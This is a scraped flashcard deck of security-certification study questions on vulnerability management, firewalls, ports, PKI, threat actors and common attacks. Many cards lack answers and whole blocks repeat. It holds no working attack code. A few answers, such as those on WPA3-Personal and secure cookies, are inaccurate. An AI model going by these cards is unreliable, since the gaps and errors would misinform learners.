A controlled release of information about a vulnerability after a fix is created.
What are bug bounty programs?
Rewards for discovering vulnerabilities, allowing researchers to earn money for documenting them.
What does vulnerability classification involve?
Scanners look for signatures in application scans, web application scans, and network scans.
What are the environmental variables in vulnerability analysis?
What is the impact of industry/organization on vulnerabilities?
What is risk tolerance in security?
What is the most common mitigation technique for vulnerabilities?
What are the types of patches?
What does cybersecurity insurance cover?
What is segmentation in security?
What is the purpose of logical segmentation with VLANs?
What are compensating controls?
Why is security monitoring essential?
What does log aggregation involve?
What are the types of users for remote access systems?
What do firewall and IPS reports indicate?
What is the function of a SIEM?
What does log aggregation enable?
What is crucial in a constantly changing threat landscape?
What should be actively checked in systems?
What is the average time to identify and contain a breach?
About 9 months (IBM security report, 2022)
What is an exception in vulnerability management?
What is required after a vulnerability is patched?
What is essential for ongoing vulnerability management?
What are the methods for notification in security alerting?
What is the purpose of alert tuning?
What is SCAP used for?
How can SCAP content be utilized?
What does SCAP stand for?
Security Content Automation Protocol
What can SCAP content be shared between?
Tools
What does SCAP focus on?
Configuration compliance
What is a key benefit of SCAP in large environments?
Detect applications with known vulnerabilities
What are some types of automation in SCAP?
What should benchmarks apply to?
What is an example of a mobile device security setting?
Disable screenshots
What is the role of agents in compliance checks?
Install software agent onto the device
What is an advantage of agentless checks?
Runs without a formal install
What does SIEM stand for?
Security Information and Event Management
What does anti-malware software stop?
Spyware, ransomware, fileless malware
What does DLP stand for?
Data Loss Prevention
What does SNMP stand for?
Simple Network Management Protocol
What is the purpose of SNMP traps?
Communicate alerts without constant polling
What does NetFlow gather?
Traffic statistics from all traffic flows
What is a vulnerability scanner used for?
Identify systems and security devices
What is the purpose of firewalls?
What are the two types of firewalls?
What does NGFW stand for?
Next-generation firewall
What layer does an NGFW operate at?
OSI Application Layer (Layer 7)
What is Network Address Translation (NAT)?
Converts private IP addresses to public IP addresses
What is the function of Access Control Lists (ACLs)?
Allow or disallow traffic based on criteria
What is the purpose of a screened subnet?
Provides an additional layer of security between the network and the Internet
What are the two methods for finding malicious traffic in IPS?
What does implicit deny mean in firewall rules?
Traffic not explicitly allowed is denied
What is the role of VPN in firewalls?
Encrypts traffic between sites
What is deep packet inspection?
Analyzes every packet for security decisions
What protocols are commonly used in firewalls for forwarding decisions?
What port does a web server typically use?
tcp/80, tcp/443
What port does SSH use?
tcp/22
What port does Microsoft RDP use?
tcp/3389
What port does a DNS query use?
udp/53
What port does NTP use?
udp/123
What are the categories of security controls?
What are compensating controls?
What does authorization determine?
What access you have based on your identification and authentication.
What is the purpose of authorization?
To determine access rights based on identification and authentication.
What is a Certificate Authority (CA)?
An organization that creates and digitally signs certificates for devices.
What does an authorization model help with?
It defines access rights by Roles, Organizations, Attributes, etc.
What does Zero Trust in network security entail?
Everything must be verified; nothing is inherently trusted.
What are key elements of a Zero Trust approach?
What is the Zero Trust principle?
Everything must be verified. Nothing is inherently trusted. Use multi-factor authentication and encryption.
What are the planes of operation in networking?
What is a Policy Enforcement Point (PEP)?
The gatekeeper that allows, monitors, and terminates connections.
What is the role of a Policy Engine?
Evaluates access decisions based on policy and other information.
What are security zones?
Categorize access based on trust levels: trusted, untrusted, internal, external.
What is the purpose of fencing in physical security?
Build a perimeter to prevent unauthorized access.
What is two-person integrity/control?
Minimizes exposure to attacks by requiring two individuals for access.
What is the purpose of physical protection at the reception area?
Validates identification of existing employees
What is two-person integrity/control?
Minimizes exposure to an attack; no single person has access to a physical asset
What should an access badge include?
What is the function of infrared sensors?
Detects infrared radiation in both light and dark; common in motion detectors
What is the purpose of honeypots?
Attracts attackers and traps them; creates a virtual world to explore
What are honeynets?
A real network that includes multiple devices; builds a larger deception network
What are honeyfiles?
Files with fake information designed to attract attackers; alerts sent if accessed
What is change management?
Process for making changes like upgrades, patches, or configuration changes
What is the change approval process?
Formal process to manage change; includes request forms, risk analysis, and approvals
What is the role of ownership in change management?
An individual manages the change process; ensures the process is followed
Who are considered stakeholders in change management?
Individuals or groups impacted by the change; they provide input
What should be upgraded for shipping?
What risks can occur without change?
What is the standard operating procedure for change management?
What is required after implementing new configurations?
What can you do to recover from a power outage?
What should you do with legacy applications?
What are dependencies in system management?
What is Public Key Infrastructure (PKI)?
What is asymmetric encryption?
What is important when managing encryption keys?
What is the significance of cryptographic keys?
They determine the output of encrypted data, hash values, and digital signatures.
What does a Trusted Platform Module (TPM) provide?
What is a Hardware Security Module (HSM) used for?
What are common steganography techniques?
What is a public key certificate?
Binds a public key with a digital signature and other details about the key holder.
What does a digital signature add?
Adds trust; PKI uses Certificate Authorities for additional trust.
What are typical details in a digital certificate?
What is a Certificate Signing Request (CSR)?
A request sent to the CA containing a public key to be signed.
What are self-signed certificates?
Internal certificates not signed by a public CA; used within an organization.
What is a wildcard certificate?
Supports many different domains; applies to all server names in a domain.
What is OCSP stapling?
Status information is stored on the certificate holder’s server and stapled into the SSL/TLS handshake.
What are the steps to create a certificate?
What are the motivations of threat actors?
What defines nation-state attackers?
Government entities with massive resources and high sophistication.
What characterizes unskilled attackers?
Run pre-made scripts, motivated by disruption or data exfiltration.
What is an insider threat?
Internal entity motivated by revenge or financial gain, with institutional knowledge.
What is organized crime in cybersecurity?
Professional criminals motivated by money, often very sophisticated.
What is the risk of open service ports?
What is the significance of cloud usage in Shadow IT?
How to protect against impersonation?
What is a watering hole attack?
What is required for executing a watering hole attack?
What happened in January 2017?
What is misinformation/disinformation?
What is a race condition?
A programming issue where multiple processes happen simultaneously, potentially leading to errors.
What can cause a reboot loop in systems?
Improper handling of file system problems, as seen in the Mars rover 'Spirit'.
What should you always do when installing software updates?
Keep your operating system and applications updated.
What should you do to verify app updates?
Visit the developer’s site directly - Don’t trust random update buttons or files
What do many operating systems require for apps?
They require signed apps - Don't disable security controls
What is the Solarwinds Orion supply chain attack?
Attackers added malicious code to updates - Reported in December 2020
What vulnerabilities were reported on May 9, 2023?
What is SQL injection (SQLi)?
Putting your own SQL requests into an application - Shouldn't be allowed
What is a non-persistent (reflected) XSS attack?
Web site allows scripts in user input - Attacker emails a link with malicious script
What is a persistent (stored) XSS attack?
Attacker posts a message with payload - Everyone viewing the page gets it
What is a malicious payload?
A payload that spreads quickly to all viewers of a page, making it 'persistent'.
What happens when someone views a malicious message?
It can be posted to their page and propagate further.
What vulnerability did Aaron Guzman discover in Subaru?
A token that never expires, allowing unauthorized access.
What is a potential risk of a valid token?
Allows any service request, including adding an email to another's account.
How can you protect against XSS?
What is a significant concern regarding technology EOSL?
Lack of security patches and updates for unsupported products.
What are virtualization vulnerabilities?
What happened in March 2017 at Pwn2Own?
What should be included with the contract for service providers?
Ongoing security audits of all providers
What are challenges in mobile device security?
How can you protect against ransomware?
How can you protect against spyware?
How can you remove bloatware?
What can malware log?
What happened on March 19, 2013 in South Korea?
Email with malicious attachment sent; Trojan installed malware.
What did the malware do on March 20, 2013?
Activated logic bomb, deleted storage and master boot record.
How can you prevent a logic bomb?
What is a rootkit?
A malicious software that modifies core system files and is often invisible to the OS.
How can you find and remove rootkits?
What are physical attacks?
Attacks that bypass digital security by gaining physical access to systems.
What is brute force in physical security?
Physically pushing through obstructions without needing a password.
What are environmental attacks?
Attacks targeting the operating environment, like HVAC and power systems.
What is a Denial of Service (DoS) attack?
An attack that overloads a service to make it unavailable.
What is a Distributed Denial of Service (DDoS) attack?
Using multiple computers to bring down a service.
What is a DDoS attack?
An attack that uses an army of computers to overwhelm a service, causing a traffic spike.
What is a wireless deauthentication attack?
A DoS attack that disconnects users from a wireless network.
What does wireless jamming do?
Prevents wireless communication - Transmits interfering signals - Decreases signal-to-noise ratio
What is the difference between interference and jamming?
Interference is unintentional - Jamming is intentional disruption
What is an on-path attack?
Formerly known as man-in-the-middle - Redirects traffic without detection
What is a replay attack?
An attacker reuses transmitted information - Requires raw network data access
What are browser cookies?
Stored information by the browser - Used for tracking and session management
What is session hijacking?
An attacker intercepts a session ID - Gains access using victim's credentials
What is pass the hash?
An attacker captures username and password hash - Uses them to authenticate as the victim
What is malicious code?
Code used to exploit vulnerabilities - Can be delivered through various techniques
What are ways to get into a well-secured system?
What protects against malicious code?
What is WannaCry ransomware?
What is SQL injection?
What is a replay attack?
What is privilege escalation?
What mitigates privilege escalation?
What is the purpose of bounds checking?
What is the role of HTTPS in security?
What is the CVE-2023-29336 vulnerability?
Which systems are affected by Win32k Kernel driver vulnerability?
What is Cross-site Request Forgery (CSRF)?
One-click attack that exploits user trust in a web application.
What is a significant oversight in web application development regarding CSRF?
Lack of anti-forgery techniques.
What vulnerability did the POODLE attack exploit?
TLS vulnerability that forced clients to fallback to SSL 3.0.
What should you do if your application saves passwords as plaintext?
Get a better application that hashes passwords.
What is a brute force attack?
Trying every possible password combination until the correct one is found.
What happens during an online brute force attack?
Attempts to log in repeatedly, often leading to account lockouts.
What is an indicator of compromise (IOC)?
An event indicating a potential intrusion, such as unusual network activity.
What can cause an account lockout?
Exceeded login attempts or administrative disabling of the account.
What does concurrent session usage refer to?
Multiple logins from different locations by the same user.
What is an attacker's goal regarding blocked content?
To remain undetected in the system for as long as possible.
What is a common reason attackers want to stay in a system?
What should you look for to prevent blocked content?
What is the purpose of access control lists (ACLs)?
What can be included in ACL configurations?
What should be monitored for signs of an attack?
What should be included in extensive checks during configuration enforcement?
What is a host-based firewall?
What does a host-based Intrusion Prevention System (HIPS) do?
What should you do with open ports and services?
Why should you change default passwords?
What is the risk of unnecessary software?
What is a cloud responsibility matrix?
What are hybrid cloud considerations?
What is infrastructure as code?
What are microservices?
What is a monolithic application?
One big application that does everything, containing user interface, business logic, and data input/output.
What are APIs used for in microservices?
APIs serve as the 'glue' for microservices, allowing them to work together as a single application.
What are the benefits of microservices?
What is physical isolation in network infrastructure?
Devices are physically separate, requiring direct connections or switches for communication.
What is the purpose of VLANs?
VLANs provide logical segmentation, separating networks without physical isolation.
What are the three planes of SDN?
What is a centralized approach in security management?
Centralizes security management for correlated alerts and consolidated log analysis.
What is virtualization?
Running multiple operating systems on the same hardware, with each application instance having its own OS.
What are the challenges of a monolithic architecture?
Large codebase and change control challenges due to everything being in one application.
What is the responsibility matrix in microservices?
Defines how different components interact, including clients, APIs, and microservices.
What are the security concerns between on-premises and cloud?
On-premises offers full control but higher costs; cloud is centralized and generally less expensive.
What is an application container?
A standardized unit of software containing everything needed to run an application.
What is a real-time operating system (RTOS)?
An OS with a deterministic processing schedule, critical for industrial equipment.
What defines embedded systems?
Hardware and software designed for a specific function or part of a larger system.
What is high availability (HA)?
Systems that are always on and available, often requiring redundancy.
What is the importance of availability in IT?
System uptime is crucial for accessing data and completing transactions.
What does resilience refer to in IT?
The ability to maintain availability and recover quickly after an incident.
What factors contribute to cost in IT infrastructure?
Initial installation, ongoing maintenance, and repair costs.
What are common vulnerabilities in security?
How to minimize the attack surface?
What contributes to security?
What is the difference between active and passive monitoring?
What does an Intrusion Prevention System (IPS) do?
Watches network traffic and stops intrusions before they enter the network.
What is the function of a proxy?
Sits between users and external networks to handle requests on behalf of users.
What is an open proxy?
A third-party, uncontrolled proxy that can pose significant security concerns.
What is an application proxy?
A proxy that understands how an application works, often used for HTTP.
What is a forward proxy?
An 'internal proxy' used to protect and control user access to the Internet.
What is port security?
Authentication methods to control access on networks, used in both wired and wireless networks.
What is IEEE 802.1X?
Port-based Network Access Control (NAC) that requires authentication before network access.
What are the roles in IEEE 802.1X?
What is load balancing?
Distributing load across multiple servers to ensure fault tolerance and performance.
What is active/active load balancing?
All servers are active and share the load; provides fault tolerance and fast convergence.
What is active/passive load balancing?
Some servers are active while others are standby; passive servers take over if active ones fail.
What are sensors in networking?
Devices that aggregate information from network devices, like intrusion prevention systems and logs.
What are collectors in networking?
Devices that gather data from sensors, such as SIEM consoles and syslog servers.
What is the role of a firewall?
Controls the flow of network traffic, protecting sensitive materials and controlling content.
What is the difference between OSI layer 4 and OSI layer 7?
What is the purpose of a web application firewall (WAF)?
What does a Unified Threat Management (UTM) appliance include?
What is the role of a VPN concentrator?
What are the types of data classifications?
What types of financial information exist?
What is the difference between human-readable and non-human readable data?
What does classifying sensitive data involve?
What are the data classifications?
What is Proprietary data?
Data that is the property of an organization, may include trade secrets, often unique to an organization.
What is included in PHI?
Health information associated with an individual, including health status and care records.
What is data in transit?
Data transmitted over a network, also known as data in-motion, requires transport encryption.
What is data in use?
Data actively processing in memory, usually decrypted, can be vulnerable to attacks.
What is data sovereignty?
Data residing in a country is subject to that country's laws, including GDPR regulations.
What is geolocation used for?
Tracks location details, can manage data access based on user location.
What is geofencing?
Automatically allows or restricts access based on user location, e.g., office proximity.
What is the purpose of encryption?
To encode information into unreadable data, converting plaintext to ciphertext.
What is hashing?
Represents data as a short string of text, a one-way trip creating a message digest.
What is a key feature of hashing?
It's a one-way trip; impossible to recover the original message from the digest.
How is tokenization used in credit card processing?
Uses a temporary token during payment to prevent misuse of captured card numbers.
What is the benefit of segmentation?
Separating data to reduce risk of a single breach affecting all data.
What is the purpose of load balancing?
Distributing load across multiple servers to optimize performance.
What is a hot site?
What is a warm site?
What is platform diversity?
What is continuity of operations planning (COOP)?
What is the role of people in capacity planning?
What is a snapshot in backup?
What is replication in data backup?
What is journaling in data storage?
What are secure baselines?
How should you deploy baselines?
Why is hardening important?
What is critical for mobile devices security?
What is essential for workstations security?
What are common security concerns for cellular networks?
What should be done to secure a wireless network?
What is the WPA2 PSK problem?
Brute-force attack on the pre-shared key (PSK) using the four-way handshake
What is the purpose of WPA3's mutual authentication?
Creates a shared session key without sending it across the network
What does WPA3-Personal use?
WPA2 or WPA3 with a pre-shared key; everyone uses the same 256-bit key.
What does WPA3-Enterprise do?
Authenticates users individually with an authentication server (i.e., RADIUS).
What are the components of the AAA framework?
What does IEEE 802.1X provide?
Port-based Network Access Control (NAC); access only after authentication.
What is the purpose of input validation?
To validate actual input against expected input and correct it.
What are secure cookies?
Cookies with a Secure attribute; sent only over HTTPS and not for sensitive data.
What is Static Application Security Testing (SAST)?
A method to identify security flaws like buffer overflows and database injections.
What is code signing?
Digital signature of an application by the developer to confirm integrity and origin.
What is a sandbox used for?
What does application security monitoring provide?
What can be viewed in application security monitoring?
What is involved in the acquisition process?
What is asset tracking used for?
What should be included in asset monitoring?
What is the purpose of media sanitization?
What methods exist for physical destruction of data?
What is static code analysis used for?
What are the types of testing involved in dynamic analysis?
What is the CERT Basic Fuzzing Framework?
A framework developed by Carnegie Mellon Computer Emergency Response Team.
What is the purpose of package monitoring?
To confirm the package is legitimate and safe before deployment.
What does proprietary/third-party intelligence provide?
Compiled threat information that can be purchased.
What is the function of the Cyber Threat Alliance (CTA)?
Members share and validate threat intelligence submissions.
What are some vulnerability types to test?
What is the National Vulnerability Database?
A synchronized database with the CVE list, providing enhanced search functionality.
What is the exposure factor?
Loss of value or business activity if the vulnerability is exploited, expressed as a percentage.
What are the steps in penetration testing?
What is responsible disclosure?
A controlled release of information about a vulnerability after a fix is created.
What are bug bounty programs?
Rewards for discovering vulnerabilities, allowing researchers to earn money for documenting them.
What does vulnerability classification involve?
Scanners look for signatures in application scans, web application scans, and network scans.
What are the environmental variables in vulnerability analysis?
What is the impact of industry/organization on vulnerabilities?
What is risk tolerance in security?
What does cybersecurity insurance cover?
What is segmentation in security?
What is the purpose of logical segmentation with VLANs?
What are compensating controls?
Why is security monitoring essential?
What does log aggregation enable?
What is crucial in a constantly changing threat landscape?
What should be actively checked in systems?
What is the average time to identify and contain a breach?
About 9 months (IBM security report, 2022)
What is an exception in vulnerability management?
What is required after a vulnerability is patched?
What is essential for ongoing vulnerability management?
What is the purpose of alert tuning?
What is SCAP used for?
How can SCAP content be utilized?
What are some types of automation in SCAP?
What is the purpose of a screened subnet?
Provides an additional layer of security between the network and the Internet
Are you sure you want to delete 0 flashcard(s)? This cannot be undone.
Select tags to remove from 0 selected flashcard(s):
Loading tags...